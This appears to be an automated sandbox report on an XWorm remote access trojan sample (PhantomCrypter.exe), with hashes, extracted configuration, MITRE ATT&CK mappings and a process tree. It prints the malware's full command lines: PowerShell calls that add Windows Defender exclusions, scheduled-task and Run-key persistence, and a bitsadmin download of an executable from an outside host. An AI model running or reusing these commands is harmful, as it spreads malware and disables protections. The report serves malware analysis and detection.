xworm | c69d8df82357c95fe43db40465d0169ea8e0feacd8a3e4debe87865544100d9e

Analysis

max time kernel
149s
max time network
154s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
23-01-2025 06:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PhantomCrypter.exe
Size

5.0MB
MD5

d4d28f2c6fd9af9ee5a3be30f9ab913b
SHA1

be4264bceaff957ff799b73ebc2479f0fc794815
SHA256

c69d8df82357c95fe43db40465d0169ea8e0feacd8a3e4debe87865544100d9e
SHA512

7eed5b6d3420c930a07aee500e086ec61fd33099cd641a2efe7664081c0e5fdab4d1ad2b4835edcbe3e6722d44e60a75119a2900cfd00b7c182b20f379d7a977
SSDEEP

98304:6l1z3/RZ58MoFyQbbpaR2p1AU6cBSdOWWzSPfEIeGLGIQaW5tqwZ0ch1+NXHKgv3:Y1z5Z58MQJe2PAU6cBSkWWzaETGDW/t

Score

10^/10

xworm discovery dropper execution persistence rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

EEarXqazEvX73BCq

Attributes

Install_directory
%AppData%
install_file
Chrome Update.exe
pastebin_url
https://pastebin.com/raw/RPPi3ByL

aes.plain

Signatures

Detect Xworm Payload 9 IoCs

resource	yara_rule
behavioral1/files/0x000c0000000122e7-7.dat	family_xworm
behavioral1/memory/484-9-0x0000000000350000-0x000000000037C000-memory.dmp	family_xworm
behavioral1/files/0x00070000000195c5-14.dat	family_xworm
behavioral1/files/0x000600000001960b-18.dat	family_xworm
behavioral1/memory/1632-19-0x0000000000040000-0x000000000006E000-memory.dmp	family_xworm
behavioral1/memory/2872-21-0x0000000000180000-0x00000000001A8000-memory.dmp	family_xworm
behavioral1/memory/2120-127-0x0000000000EA0000-0x0000000000EC8000-memory.dmp	family_xworm
behavioral1/memory/1312-128-0x0000000001180000-0x00000000011AE000-memory.dmp	family_xworm
behavioral1/memory/1660-134-0x0000000000F90000-0x0000000000FB8000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1840	powershell.exe
1508	powershell.exe
1684	powershell.exe
1796	powershell.exe
2200	powershell.exe
2604	powershell.exe
2136	powershell.exe
2032	powershell.exe
2424	powershell.exe
1484	powershell.exe
1412	powershell.exe
1604	powershell.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
2760	bitsadmin.exe

Drops startup file 6 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome Update.lnk	Chrome Update.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome Update.lnk	Chrome Update.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.lnk	OneDrive.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.lnk	OneDrive.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk	msedge.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk	msedge.exe

Executes dropped EXE 8 IoCs

pid	Process
484	Chrome Update.exe
1632	msedge.exe
2872	OneDrive.exe
2852	TOPHERC.exe
1312	msedge.exe
2120	OneDrive.exe
1660	OneDrive.exe
2300	msedge.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\Chrome Update = "C:\\Users\\Admin\\AppData\\Roaming\\Chrome Update.exe"	Chrome Update.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\OneDrive.exe"	OneDrive.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs

Web Service

T1102

flow	ioc
41	pastebin.com
139	pastebin.com
14	pastebin.com
26	pastebin.com
59	pastebin.com
83	pastebin.com
109	pastebin.com
35	pastebin.com
37	pastebin.com
73	pastebin.com
137	pastebin.com
107	pastebin.com
121	pastebin.com
16	pastebin.com
38	pastebin.com
48	pastebin.com
51	pastebin.com
101	pastebin.com
96	pastebin.com
110	pastebin.com
134	pastebin.com
29	pastebin.com
49	pastebin.com
67	pastebin.com
116	pastebin.com
125	pastebin.com
127	pastebin.com
143	pastebin.com
145	pastebin.com
28	pastebin.com
53	pastebin.com
66	pastebin.com
71	pastebin.com
82	pastebin.com
33	pastebin.com
54	pastebin.com
92	pastebin.com
95	pastebin.com
128	pastebin.com
20	pastebin.com
21	pastebin.com
56	pastebin.com
81	pastebin.com
84	pastebin.com
70	pastebin.com
18	pastebin.com
30	pastebin.com
94	pastebin.com
19	pastebin.com
69	pastebin.com
78	pastebin.com
122	pastebin.com
42	pastebin.com
74	pastebin.com
76	pastebin.com
97	pastebin.com
136	pastebin.com
57	pastebin.com
72	pastebin.com
106	pastebin.com
115	pastebin.com
112	pastebin.com
34	pastebin.com
64	pastebin.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TOPHERC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1912	schtasks.exe
844	schtasks.exe
1712	schtasks.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
2604	powershell.exe
2136	powershell.exe
2032	powershell.exe
1840	powershell.exe
1684	powershell.exe
1508	powershell.exe
1412	powershell.exe
1604	powershell.exe
1796	powershell.exe
2200	powershell.exe
2424	powershell.exe
1484	powershell.exe

Suspicious use of AdjustPrivilegeToken 19 IoCs

description	pid	Process
Token: SeDebugPrivilege	484	Chrome Update.exe
Token: SeDebugPrivilege	1632	msedge.exe
Token: SeDebugPrivilege	2872	OneDrive.exe
Token: SeDebugPrivilege	2604	powershell.exe
Token: SeDebugPrivilege	2136	powershell.exe
Token: SeDebugPrivilege	2032	powershell.exe
Token: SeDebugPrivilege	1840	powershell.exe
Token: SeDebugPrivilege	1684	powershell.exe
Token: SeDebugPrivilege	1508	powershell.exe
Token: SeDebugPrivilege	1412	powershell.exe
Token: SeDebugPrivilege	1604	powershell.exe
Token: SeDebugPrivilege	1796	powershell.exe
Token: SeDebugPrivilege	2200	powershell.exe
Token: SeDebugPrivilege	2424	powershell.exe
Token: SeDebugPrivilege	1484	powershell.exe
Token: SeDebugPrivilege	2120	OneDrive.exe
Token: SeDebugPrivilege	1312	msedge.exe
Token: SeDebugPrivilege	2300	msedge.exe
Token: SeDebugPrivilege	1660	OneDrive.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1404 wrote to memory of 484	1404	PhantomCrypter.exe	31
PID 1404 wrote to memory of 484	1404	PhantomCrypter.exe	31
PID 1404 wrote to memory of 484	1404	PhantomCrypter.exe	31
PID 1404 wrote to memory of 2520	1404	PhantomCrypter.exe	32
PID 1404 wrote to memory of 2520	1404	PhantomCrypter.exe	32
PID 1404 wrote to memory of 2520	1404	PhantomCrypter.exe	32
PID 1404 wrote to memory of 2520	1404	PhantomCrypter.exe	32
PID 1404 wrote to memory of 1632	1404	PhantomCrypter.exe	33
PID 1404 wrote to memory of 1632	1404	PhantomCrypter.exe	33
PID 1404 wrote to memory of 1632	1404	PhantomCrypter.exe	33
PID 1404 wrote to memory of 2872	1404	PhantomCrypter.exe	34
PID 1404 wrote to memory of 2872	1404	PhantomCrypter.exe	34
PID 1404 wrote to memory of 2872	1404	PhantomCrypter.exe	34
PID 1404 wrote to memory of 2852	1404	PhantomCrypter.exe	35
PID 1404 wrote to memory of 2852	1404	PhantomCrypter.exe	35
PID 1404 wrote to memory of 2852	1404	PhantomCrypter.exe	35
PID 1404 wrote to memory of 2852	1404	PhantomCrypter.exe	35
PID 2520 wrote to memory of 2760	2520	mshta.exe	36
PID 2520 wrote to memory of 2760	2520	mshta.exe	36
PID 2520 wrote to memory of 2760	2520	mshta.exe	36
PID 2520 wrote to memory of 2760	2520	mshta.exe	36
PID 484 wrote to memory of 2604	484	Chrome Update.exe	38
PID 484 wrote to memory of 2604	484	Chrome Update.exe	38
PID 484 wrote to memory of 2604	484	Chrome Update.exe	38
PID 1632 wrote to memory of 2136	1632	msedge.exe	40
PID 1632 wrote to memory of 2136	1632	msedge.exe	40
PID 1632 wrote to memory of 2136	1632	msedge.exe	40
PID 2872 wrote to memory of 2032	2872	OneDrive.exe	42
PID 2872 wrote to memory of 2032	2872	OneDrive.exe	42
PID 2872 wrote to memory of 2032	2872	OneDrive.exe	42
PID 484 wrote to memory of 1840	484	Chrome Update.exe	44
PID 484 wrote to memory of 1840	484	Chrome Update.exe	44
PID 484 wrote to memory of 1840	484	Chrome Update.exe	44
PID 1632 wrote to memory of 1508	1632	msedge.exe	46
PID 1632 wrote to memory of 1508	1632	msedge.exe	46
PID 1632 wrote to memory of 1508	1632	msedge.exe	46
PID 2872 wrote to memory of 1684	2872	OneDrive.exe	48
PID 2872 wrote to memory of 1684	2872	OneDrive.exe	48
PID 2872 wrote to memory of 1684	2872	OneDrive.exe	48
PID 484 wrote to memory of 1412	484	Chrome Update.exe	50
PID 484 wrote to memory of 1412	484	Chrome Update.exe	50
PID 484 wrote to memory of 1412	484	Chrome Update.exe	50
PID 2872 wrote to memory of 1604	2872	OneDrive.exe	52
PID 2872 wrote to memory of 1604	2872	OneDrive.exe	52
PID 2872 wrote to memory of 1604	2872	OneDrive.exe	52
PID 1632 wrote to memory of 1796	1632	msedge.exe	54
PID 1632 wrote to memory of 1796	1632	msedge.exe	54
PID 1632 wrote to memory of 1796	1632	msedge.exe	54
PID 484 wrote to memory of 2200	484	Chrome Update.exe	56
PID 484 wrote to memory of 2200	484	Chrome Update.exe	56
PID 484 wrote to memory of 2200	484	Chrome Update.exe	56
PID 2872 wrote to memory of 2424	2872	OneDrive.exe	58
PID 2872 wrote to memory of 2424	2872	OneDrive.exe	58
PID 2872 wrote to memory of 2424	2872	OneDrive.exe	58
PID 1632 wrote to memory of 1484	1632	msedge.exe	60
PID 1632 wrote to memory of 1484	1632	msedge.exe	60
PID 1632 wrote to memory of 1484	1632	msedge.exe	60
PID 484 wrote to memory of 1712	484	Chrome Update.exe	62
PID 484 wrote to memory of 1712	484	Chrome Update.exe	62
PID 484 wrote to memory of 1712	484	Chrome Update.exe	62
PID 2872 wrote to memory of 1912	2872	OneDrive.exe	64
PID 2872 wrote to memory of 1912	2872	OneDrive.exe	64
PID 2872 wrote to memory of 1912	2872	OneDrive.exe	64
PID 1632 wrote to memory of 844	1632	msedge.exe	66

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\PhantomCrypter.exe
"C:\Users\Admin\AppData\Local\Temp\PhantomCrypter.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1404
- C:\Users\Admin\AppData\Roaming\Chrome Update.exe
  "C:\Users\Admin\AppData\Roaming\Chrome Update.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:484
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Chrome Update.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2604
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome Update.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1840
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Chrome Update.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1412
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome Update.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2200
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome Update" /tr "C:\Users\Admin\AppData\Roaming\Chrome Update.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1712
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\DownloaderLuc.hta"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2520
- - C:\Windows\SysWOW64\bitsadmin.exe
    "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://spyderrock.com/xkdg5397-run.exe C:\Users\Admin\AppData\Local\Temp\Notify.exe
    3⤵
    - Download via BitsAdmin
    - System Location Discovery: System Language Discovery
    PID:2760
- C:\Users\Admin\AppData\Roaming\msedge.exe
  "C:\Users\Admin\AppData\Roaming\msedge.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1632
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\msedge.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2136
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1508
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\msedge.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1796
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1484
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Local\msedge.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:844
- C:\Users\Admin\AppData\Roaming\OneDrive.exe
  "C:\Users\Admin\AppData\Roaming\OneDrive.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2872
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\OneDrive.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2032
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1684
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\OneDrive.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1604
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2424
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\ProgramData\OneDrive.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1912
- C:\Users\Admin\AppData\Roaming\TOPHERC.exe
  "C:\Users\Admin\AppData\Roaming\TOPHERC.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2852

C:\Windows\system32\taskeng.exe
taskeng.exe {49BD7CC4-C0FC-4678-BE1F-416FC966CA5B} S-1-5-21-2872745919-2748461613-2989606286-1000:CCJBVTGQ\Admin:Interactive:[1]
1⤵
PID:1748
- C:\Users\Admin\AppData\Local\msedge.exe
  C:\Users\Admin\AppData\Local\msedge.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1312
- C:\ProgramData\OneDrive.exe
  C:\ProgramData\OneDrive.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2120
- C:\Users\Admin\AppData\Local\msedge.exe
  C:\Users\Admin\AppData\Local\msedge.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2300
- C:\ProgramData\OneDrive.exe
  C:\ProgramData\OneDrive.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1660

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

BITS Jobs

T1197

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

BITS Jobs

T1197

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Chrome Update.exe

Filesize
152KB

MD5
16cdd301591c6af35a03cd18caee2e59

SHA1
92c6575b57eac309c8664d4ac76d87f2906e8ef3

SHA256
11d55ac2f9070a70d12f760e9a6ee75136eca4bf711042acc25828ddda3582c8

SHA512
a44402e5e233cb983f7cfd9b81bc542a08d8092ffa4bd970fc25fe112355643506d5dfee0dd76f2e79b983df0fde67bfc50aabb477492a7596e38081e4083476

Download Submit
C:\Users\Admin\AppData\Roaming\DownloaderLuc.hta

Filesize
844B

MD5
3f8a283abe6fe28a7d217c8105041426

SHA1
0283cd67e7cc0a99eeae3c3dea69716a6ac75bb1

SHA256
333c439c84ccbcab11dd9cc7f4d90596c5b65caf1164e8a908e61aa0222916b1

SHA512
bc5f8f256356c689953516877f8b7895fb1efe587feabdddf0e1524d0b22e3dcb89e0e654d19d0c314c6a376a0e7594965178a353d147ea98c43d3d5976f1846

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
6aba501df716dee695d9a488ba5ca5b3

SHA1
7f41d55b1ca8f2fb809ae074fca8903d4adc7761

SHA256
e125f54ff484633c6df56a0c5bc8c06a3b059dd2f8cf46427ac5469f485fbc0d

SHA512
10df6888cac320b14f01e4c2850ea53971e8b188c5bab8ceee502ad4b567356fd780973babba0d86bebf90b8fc63915a31caa027ddc504b0ebd1fbe1b6980ac5

Download Submit
C:\Users\Admin\AppData\Roaming\OneDrive.exe

Filesize
140KB

MD5
a1cd6f4a3a37ed83515aa4752f98eb1d

SHA1
7f787c8d72787d8d130b4788b006b799167d1802

SHA256
5cbcc0a0c1d74cd54ac999717b0ff0607fe6ed02cca0a3e0433dd94783cfec65

SHA512
9489287e0b4925345fee05fe2f6e6f12440af1425ef397145e32e6f80c7ae98b530e42002d92dc156643f9829bc8a3b969e855cecd2265b6616c4514eed00355

Download Submit
C:\Users\Admin\AppData\Roaming\TOPHERC.exe

Filesize
4.2MB

MD5
79f2fd33a188ff47216b4f4dd4552582

SHA1
16e40e0a1fed903fec20cd6cd600e3a2548881ad

SHA256
cc45d38fa00c5aeb33bdf842166460117b5e70b0b4fcf5bb6ef9747ec0b0575f

SHA512
caa33702fdc7e480a6093d2af035f860044a4e960fd6e5a4b91d6019f2c3d4c235d9e95734e6b54ea2a88af4e96bf72a54d81b2a70c1f64e76dcd202891905f2

Download Submit
C:\Users\Admin\AppData\Roaming\msedge.exe

Filesize
166KB

MD5
aee20d80f94ae0885bb2cabadb78efc9

SHA1
1e82eba032fcb0b89e1fdf937a79133a5057d0a1

SHA256
498eb55b3fb4c4859ee763a721870bb60ecd57e99f66023b69d8a258efa3af7d

SHA512
3a05ff32b9aa79092578c09dfe67eaca23c6fe8383111dab05117f39d91f27670029f39482827d191bd6a652483202b8fc1813f8d5a0f3f73fd35ca37a4f6d42

Download Submit
memory/484-29-0x000007FEF6570000-0x000007FEF6F5C000-memory.dmp

Filesize
9.9MB

Download
memory/484-120-0x000007FEF6570000-0x000007FEF6F5C000-memory.dmp

Filesize
9.9MB

Download
memory/484-9-0x0000000000350000-0x000000000037C000-memory.dmp

Filesize
176KB

Download
memory/1312-128-0x0000000001180000-0x00000000011AE000-memory.dmp

Filesize
184KB

Download
memory/1404-0-0x000007FEF6573000-0x000007FEF6574000-memory.dmp

Filesize
4KB

Download
memory/1404-1-0x0000000000A50000-0x0000000000F58000-memory.dmp

Filesize
5.0MB

Download
memory/1632-19-0x0000000000040000-0x000000000006E000-memory.dmp

Filesize
184KB

Download
memory/1660-134-0x0000000000F90000-0x0000000000FB8000-memory.dmp

Filesize
160KB

Download
memory/1840-53-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

Filesize
2.9MB

Download
memory/1840-54-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

Filesize
32KB

Download
memory/2120-127-0x0000000000EA0000-0x0000000000EC8000-memory.dmp

Filesize
160KB

Download
memory/2136-41-0x00000000027E0000-0x00000000027E8000-memory.dmp

Filesize
32KB

Download
memory/2604-40-0x000000001B5A0000-0x000000001B882000-memory.dmp

Filesize
2.9MB

Download
memory/2852-30-0x0000000000DB0000-0x00000000011E8000-memory.dmp

Filesize
4.2MB

Download
memory/2872-21-0x0000000000180000-0x00000000001A8000-memory.dmp

Filesize
160KB

Download